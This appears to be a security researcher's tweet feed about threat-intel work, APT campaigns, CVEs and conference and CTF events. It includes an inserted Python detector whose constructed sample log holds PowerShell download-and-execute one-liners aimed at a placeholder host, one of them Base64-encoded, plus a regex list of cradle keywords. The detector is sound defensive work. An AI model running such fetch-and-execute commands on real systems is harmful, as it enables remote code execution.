Security researcher @TalosSecurity / Ex-Googler / Black Hat & HITCON Review Board / Organizer of @rhacklette41. These tweets are my own, not my employer's.
🚨 We discovered that some versions of WeChat were vulnerable to CVE-2023-3420 due to the outdated V8 engine in Xweb. We reported this to the vendor in April. WeChat users should update to the latest version to stay secure. More details in #vulnerability
After 3 years at Google TAG, I'm delighted to announce an exciting new chapter in my career. I'm joining @TalosSecurity to conduct threat intelligence research and counter threat actors. Looking forward to collaborating with brilliant minds and growing in this new adventure.
It was such an honor to present at the first ever @pivot_con! Also proud of myself for doing the panel ❤️ I had an amazing time there: perfect location, high quality talks and "my people"!! Shoutout to the organizer team!! Thank you for the incredible job! #pivotcon24
Cookie theft is still a common account hijacking technique adopted by criminal groups. I have been tracking & disrupting this group with multiple security teams since I joined Google. Happy to share our results and findings in this blog.
It's hard to find a talk that's novel, technical and inspiring at the same time, but @orange_8361 can always accomplish that. Definitely one of the best talks I have ever attended. @hexacon_fr
I'm honored to be recognized as one of the "32 Influential Malware Research Professionals" in the new ebook of . Thank you @Peerlyst, @chihebchebbi201 and everyone who has supported me!
It was great to see everyone at the CTF crash course of @rhacklette41 last night! Hopefully everyone learned something useful about reverse engineering! Looking forward to seeing you again at our next one and solving some challenges together 😃!
Attended my first @Blackhoodie_RE workshop and had a wonderful Android reversing training from @maddiestone. Also gave a lightning talk about "From Threat Intelligence to Pokemon Master". Thank you to everyone who made this weekend awesome!
@craghuprasad and I published 2 new blogs about the Sugargh0st campaigns. We are tracking the group as Sneakychef, and named the new RAT found in the campaign SpiceRAT. The group is targeting a wider scope of government entities in EMEA and Asia. #sugargh0st #sneakychef
Our threat intel teams continue to look out for and disrupt disinfo campaigns, hacking, and financially motivated abuse, and are working with other companies and relevant government bodies to address these threats.
I have the honor of giving away two passes to the @BlackHatEvents Black Hat Asia conference! Priority goes to students and anyone who needs support to attend. PM me if interested. #BHASIA
So excited and honoured to have this chance to share my research at the very first #PIVOTcon24 in May!! Thank you to all the crews for organising! Looking forward to seeing all the brilliant people and research!
📢 Yes. It's here. Absolutely mind blowing. The highlights of the #PIVOTcon24 #agenda. You have goosebumps all over your bodies? Drrrrrrrrumrrrrrrrroll.. 🥁🥁🥁 Go ahead and check them out! We still have some tickets 😉 #ThreatIntel #CTI 🧵1/15
Just got back from my trip to #BHASIA and a vacation in Sabah 🏝️☀️ Met so many old and new friends and the talks were amazing! Thanks to everyone who came to our session; it was such a heartwarming gathering and I've learned from you too! See you all next year!
Can't believe it's been 20 years 😬 We are calling for papers for both HITCON CMT in August and the Enterprise in October this time. Looking forward to seeing all the brilliant submissions! #HITCON #HITCONCommunity2024 #HITCONCMT2024
HITCON Community 2024 - Call for Paper
Theme: 20 Years of HITCON: Mind Meld Hacker Spirit from Human to AI
HITCON is celebrating its 20th anniversary this year, marking the evolution from underground gatherings to a renowned hacker conference over the past two decades. The
I will be joining and sharing my experience of founding a women's security community at the Women in Security Meet Up at Black Hat Asia on March 29. Everyone is welcome to join! #BHASIA
New blog post from TAG with details of a North Korean campaign targeting security researchers working on vulnerability research and development.
Stay safe out there everyone!
Why bother looking for vulnerabilities when you can just peer over the shoulder of the actor beside you? 🤓 @_clem1 is infamously known for being able to track APTs' exploit toolkits and we are extremely grateful to have him talk about it as our opening keynote! #HEXACON2024
Sharing the slides @ReinforceMagic and I presented for the Threat Hunting and Campaign Tracking 101 session during the HITCON 2020 CTI Village Workshop. The talk was only 65 mins but we tried to cover some interesting cases and insights.
WoSec ZH becomes Rhacklette! In March we officially joined @defconch. We are a group of FINTA people in security with the goal of creating a protected space for gender minorities in the security industry in Switzerland. We look forward to meeting you at upcoming events.
This year HITCON is going to publish HIT"COIN", a cryptocurrency that you can use at the booths and for participating in the event. You will receive a cold wallet badge to store your HITCOIN.
Black Hat Asia is around 10 days away! I have the honor of giving away two Live Event (Briefings Only) or Virtual-Only (Briefings Only) passes to the conference! Priority goes to students and anyone who needs support to attend. PM me if interested. #BHASIA @BlackHatEvents
🚀 Join us in Zurich for an exciting CTF training program! Boost your cybersecurity skills, solve challenges, and dive into the world of cybersecurity. Open to FINTA individuals in Rhacklette, all skill levels welcome! Register now by writing to rhacklette@defcon-switzerland.org
Great find!! The target regions of both campaigns also overlap (UZ, KZ). Definitely worth researching more potential connections between xCaon and SpiceRAT. #spicerat #sneakychef #xcaon
#SPEAKER ANNOUNCEMENT 📢 @ashley_shen_920 from @FireEye specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Full agenda here
HITCON GIRLS will be holding a smart contract challenge at #HITB2019AMS. We will be in Hapox at Beurs van Berlage on May 9 and 10. Try to solve the challenge and win some coins with us!
The schedule for Black Hat Asia 2023 is now live! It's truly an honor to have served on the review board for 7 years now, and I'm blown away by the number of outstanding submissions we received this year! Check out the lineup of talks here: #BHAsia
Next up is @ashley_shen_920 discussing ICEFOG (first reported by @kaspersky) - is it a malware family? Is it a threat group? No public reporting since 2014 - what happened? #FireEyeSummit
Another amazing HITCON is happening this year! Looking forward to seeing all your outstanding submissions! Haven't booked the flight but I will most likely be there! Feel free to reach out for a meetup 😊 #HITCON #HITCONENT2023
【HITCON Enterprise 2023 Call For Paper】
🚀 HITCON ENT 2023 theme: Automation Security Ascendancy: Systematic Evolution to Maturity.
Our CFP system is also available now. #HITCON #HITCONENT2023
Thanks for referencing our SugarGh0st blog! The target is indeed very interesting. It is also interesting that they kept using the old domain for months after we published the blog and only have a new domain for the recent campaign.
Artificial intelligence research is of high value to adversaries. @Proofpoint recently identified a SugarGh0st RAT campaign targeting US-based organizations involved in AI efforts, including those in academia, private industry, and gov't service. Brief: .
I enjoyed my time a lot at BlueHatIL so I'm really excited to join the CAB of BlueHat Shanghai. CFP is open until March 31. Don't miss your chance to speak at the very first BlueHat in Asia. #BlueHat
What an awesome hack-the-bank CTF evening organised by @ingnl!! 🎉🤗 So great to meet so many amazing women! Thank you all for making this possible and see you next time!! ❤️ #infosec #womenintech
To those in Switzerland, join our community event in Zurich on June 15th to listen to amazing lightning talks from the Google Women in Engineering group! (English talks will be in the afternoon!)
Spoiler alert! We will have another CTF training with @rhacklette41 this Sunday to solve some other reversing challenges on Hack The Box! This time we will also be doing a medium level challenge with a Windows binary, so have your VM ready!
🚀 Join us and learn how to solve CTF challenges! 📚 We will meet once a month and cover a variety of CTF topics, including but not limited to: Web security, RE, Binary exploitation, Forensics, Crypto. Each session will include a mix of lecture, hands-on exercises, and discussion.
Join us for our 2 trainings on Web App Pentest 101 on 6th and 10th July after work: How to do a pentest and what are the challenges of a security consultant? Open to FINTA individuals. Register now by writing to rhacklette@defcon-switzerland.org
Good to see Chrome is implementing more mitigations against the cookie theft attack. Malware will still be able to do process injection to bypass the mitigation, but pushing this to a more detectable behaviour is also progress! #chrome #cookietheft
With Chrome 127 on Windows, we're introducing enhanced encryption to protect sensitive data, starting with your cookies🍪! This helps protect your personal information and keeps your online accounts secure from hackers. Read more about this protection:
New Blog Post - How I forced a Chinese threat actor to help me with a campaign's attribution by adding it to a new "Taiwan" tab in my APT group mapping spreadsheet
VIDEO: Details of attacks targeting multiple banks, ATMs & Bitcoin services plus the malware, vulnerabilities discovered, and future mitigations presented at #BHASIA 2018
The research began with detecting abnormal PowerShell commands downloading additional scripts and Cobalt Strike. Interestingly, the threat actor used the “quser” command to avoid operating with other users simultaneously. #APT41 #cobaltstrike
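Added example, not from the tweet or from Talos: a small Python detector that scans process-creation log lines for the two behaviours the tweet describes, a PowerShell download cradle (including one hidden behind -EncodedCommand) and a `quser` session listing, and flags hosts where the two occur within a short window. The key=value log format, the field names, the host names and every sample command line are constructed for this example and are not real telemetry.

```python
"""Detect PowerShell download cradles and quser session checks in
process-creation logs, then correlate them per host.

Log format, field names and all sample events below are assumptions made
for this example; adapt the parser to your EDR or Sysmon schema."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# --- constructed sample data ------------------------------------------------
# A stager hidden behind -EncodedCommand: PowerShell expects Base64 over UTF-16LE.
PLAINTEXT_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PLAINTEXT_STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = f"""\
2024-05-01T09:00:01Z host=WS01 user=alice parent=explorer.exe image=powershell.exe cmdline=powershell.exe -NoProfile Get-ChildItem C:\\Users
2024-05-01T09:03:12Z host=WS01 user=alice parent=winword.exe image=powershell.exe cmdline=powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')
2024-05-01T09:03:40Z host=WS01 user=alice parent=cmd.exe image=quser.exe cmdline=quser
2024-05-01T09:10:00Z host=WS02 user=bob parent=explorer.exe image=quser.exe cmdline=quser /server:WS02
2024-05-01T09:15:00Z host=WS03 user=svc parent=services.exe image=powershell.exe cmdline=powershell.exe -enc {ENCODED}
"""

# --- parsing ----------------------------------------------------------------
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) "
    r"image=(?P<image>\S+) cmdline=(?P<cmdline>.*)$"
)


def parse_events(log_text):
    """Yield one dict per well-formed line; timestamps become datetimes."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ev


# --- detections -------------------------------------------------------------
# Strings commonly seen in PowerShell download-and-execute one-liners.
CRADLE_RE = re.compile(
    r"Net\.WebClient|Download(?:String|File|Data)|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|Invoke-Expression|\bIEX\b|Start-BitsTransfer",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """Return the script carried by an -EncodedCommand argument, else None.
    PowerShell accepts short prefixes such as -e, -ec and -enc."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lower()
        if t.startswith("-e") and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def is_download_cradle(cmdline):
    """True if the visible or decoded command line looks like a download cradle."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded
    return bool(CRADLE_RE.search(text))


def is_session_enum(image, cmdline):
    """True for the quser session listing the tweet describes."""
    return image.lower() in ("quser.exe", "quser") or cmdline.lower().split()[:1] == ["quser"]


def analyze(log_text, window=timedelta(minutes=10)):
    """Return (findings, correlated_hosts). A finding is
    (timestamp, host, kind, cmdline); a host is correlated when a cradle is
    followed by a session listing within `window`."""
    findings = []
    for ev in parse_events(log_text):
        if ev["image"].lower() == "powershell.exe" and is_download_cradle(ev["cmdline"]):
            findings.append((ev["ts"], ev["host"], "download_cradle", ev["cmdline"]))
        if is_session_enum(ev["image"], ev["cmdline"]):
            findings.append((ev["ts"], ev["host"], "session_enum", ev["cmdline"]))
    by_host = defaultdict(list)
    for f in findings:
        by_host[f[1]].append(f)
    correlated = []
    for host, fs in by_host.items():
        cradles = [f for f in fs if f[2] == "download_cradle"]
        enums = [f for f in fs if f[2] == "session_enum"]
        if any(timedelta(0) <= e[0] - c[0] <= window for c in cradles for e in enums):
            correlated.append(host)
    return findings, sorted(correlated)


if __name__ == "__main__":
    found, hosts = analyze(SAMPLE_LOG)
    for ts, host, kind, cmd in found:
        print(f"{ts:%H:%M:%S} {host} {kind}: {cmd[:60]}")
    print("correlated hosts:", hosts)
```

The point of the pairing is that neither signal is strong on its own: administrators run `quser` legitimately and some deployment scripts do download with `Net.WebClient`, but a download cradle spawned from an Office parent and followed minutes later by a session check on the same host is the sequence worth an analyst's time. On the constructed data only WS01 is correlated; WS03's encoded stager is caught as a cradle but has no follow-up, and WS02 only shows `quser`.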
Interesting #Mirage / #MirageFox sample 🇨🇳: af8aa745ba47a4a85f513979cc9e2196. Signed using fake @kaspersky cert. Compiled 30 Nov 2015 13:07:28 UTC. Looks like an operator sets C2 at runtime: ./sample.exe [C2 Server] [Port] (cc: @ashley_shen_920)
In addition to Bitdefender's Crash Handler being abused by Shadowpad, we found the Microsoft Office IME binary was also exploited. For privilege escalation, the threat actor crafted a custom loader to inject CVE-2018-0824 code. #exploit #shadowpad
Talos assesses with high confidence that the #YoroTrooper threat actor likely consists of individuals from Kazakhstan. But that hasn't stopped them from covering their tracks and disguising their origins. More on this threat actor in our latest blog